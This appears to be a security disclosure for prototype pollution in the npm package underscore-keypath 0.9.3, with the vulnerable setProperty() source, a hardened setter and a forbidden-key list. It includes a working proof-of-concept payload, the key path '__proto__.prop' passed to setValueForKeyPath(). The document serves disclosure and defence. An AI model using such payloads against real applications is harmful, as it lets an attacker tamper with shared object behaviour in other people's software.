Created April 9, 2023 07:44
Pollution Vulnerability Disclosure in the "underscore-keypath" library
1、Affected module
The prototype pollution affects underscore-keypath@0.9.3.
underscore-keypath provides key-path mechanism extensions for underscore (as a mixin); it lets you access JavaScript objects and arrays with keypaths easily.
2、Relevant package manager/ecosystem
NPM ecosystem
3、Vulnerability details
Prototype pollution vulnerability in the function setProperty() in underscore-keypath.js in underscore-keypath@0.9.3.
In setProperty(), the assignment obj[name] = value at line 162 is the point of prototype pollution: name is written into obj without being checked.
4、Steps to reproduce
The entry function is setValueForKeyPath(). It does not check path components such as "__proto__", so a malicious path containing "__proto__" is passed through to setProperty(), which leads to prototype pollution.
```javascript
var underscore = require("underscore-keypath");

// First PoC: the key path given as an array
// var BAD_ARRAY2 = ["__proto__", "prop"];
// console.log("Before: " + {}.prop);
// underscore.setValueForKeyPath({}, BAD_ARRAY2, "polluted");
// console.log("After: " + {}.prop);

// Second PoC: the key path given as a dotted string
console.log("Before: " + {}.prop);   // prop is not defined on a fresh object
var BAD_path = "__proto__.prop";
underscore.setValueForKeyPath({}, BAD_path, "polluted");
console.log("After: " + {}.prop);    // prop now resolves through Object.prototype
```
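As an added example (not code from underscore-keypath or from the reporters), a minimal keypath setter shaped like the reported setValueForKeyPath()/setProperty() path, next to a hardened variant that rejects prototype-chain keys and descends only into own properties; the function names and the pollutionProbe() helper are chosen for this demonstration.

```javascript
// Added example, not code from underscore-keypath: a setter with the same
// unchecked obj[name] = value as the reported setProperty(), next to a fixed one.
const FORBIDDEN_KEYS = new Set(["__proto__", "constructor", "prototype"]);

// Vulnerable shape: every segment is read and written without checking its name,
// so "__proto__" walks onto Object.prototype and the final write lands there.
function setValueForKeyPathUnsafe(obj, path, value) {
  const keys = Array.isArray(path) ? path : path.split(".");
  let cur = obj;
  for (let i = 0; i < keys.length - 1; i++) {
    if (cur[keys[i]] === undefined) cur[keys[i]] = {};
    cur = cur[keys[i]];
  }
  cur[keys[keys.length - 1]] = value;
  return value;
}

// Hardened variant: refuse segments that name the prototype chain, and only
// descend into own properties (otherwise "toString.x" would reach the shared
// inherited function object instead of a fresh child object).
function setValueForKeyPathSafe(obj, path, value) {
  const keys = Array.isArray(path) ? path : path.split(".");
  for (const k of keys) {
    if (FORBIDDEN_KEYS.has(k)) throw new TypeError("forbidden key: " + k);
  }
  let cur = obj;
  for (let i = 0; i < keys.length - 1; i++) {
    if (!Object.prototype.hasOwnProperty.call(cur, keys[i])) cur[keys[i]] = {};
    cur = cur[keys[i]];
  }
  cur[keys[keys.length - 1]] = value;
  return value;
}

// Runs one setter with the disclosure's payload against a throwaway object and
// reports what a fresh {} sees afterwards; Object.prototype is cleaned up so the
// probe leaves no trace behind.
function pollutionProbe(setter) {
  const before = ({}).prop;
  let threw = false;
  try { setter({}, "__proto__.prop", "polluted"); } catch (e) { threw = true; }
  const after = ({}).prop;
  delete Object.prototype.prop;
  return { before, after, threw };
}
```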
5、Credit: Yuhan Gao (gyhlelecola@163.com), Peng Zhou (zpbrent@gmail.com)
If you receive my email, please give me a reply. I look forward to your reply.
```javascript
// setProperty() from underscore-keypath.js (underscore-keypath@0.9.3)
function setProperty(obj, name, value) {
    "use strict";
    // a custom setter such as setFoo() takes precedence
    var setter = obj["set" + capitalize(name)];
    if (setter) {
        return setter.call(obj, value);
    }
    // names starting with "@" are array operations
    if (name.indexOf("@") === 0) {
        return setArrayProperty(obj, name, value);
    }
    // line 162: name is assigned without any check, so a walk that reached
    // Object.prototype through "__proto__" writes to the shared prototype here
    obj[name] = value;
    return value;
}
```